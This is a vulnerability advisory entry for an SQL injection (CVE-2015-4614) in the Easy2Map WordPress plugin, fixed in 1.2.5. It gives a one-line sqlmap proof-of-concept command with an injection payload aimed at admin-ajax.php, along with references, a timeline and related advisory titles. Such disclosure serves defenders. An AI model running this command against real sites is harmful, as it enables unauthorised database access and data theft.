Easy2Map < 1.2.5 – SQL Injection | CVE 2015-4614 | Plugin Vulnerabilities

Description

The Function.php file uses sprintf() to format queries being sent to the database, this doesn't provide proper sanitisation of user input or properly parameterises the query.

Proof of Concept

$ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

Affects Plugins

Fixed in 1.2.5

References

CVE

CVE

URL

https://packetstormsecurity.com/files/#132551/

URL

https://plugins.trac.wordpress.org/changeset/1191455/easy2map

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Larry W. Cashdollar

Submitter twitter

Verified

No

WPVDB ID

49135a0c-34b4-4ee2-b2ad-e4f646619ac4

Timeline

Publicly Published

2015-06-08 (about 10 years ago)

Added

2015-07-05 (about 10 years ago)

Last Updated

2019-10-22 (about 6 years ago)

Other

Published

Title

Published

2025-10-14

Title

External Login <= 1.11.2 - Unauthenticated SQL Injection via log

Published

2018-01-06

Title

WpJobBoard < 4.5 - Multiple SQL Injections

Published

2024-08-01

Title

WP User Frontend < 4.0.8 - Authenticated (Administrator+) SQL Injection

Published

2025-01-22

Title

Product Table by WBW < 2.1.3 - Unuthenticated SQL Injection

Published

2026-01-28

Title

Woodly Core <= 1.4 - Unauthenticated SQL Injection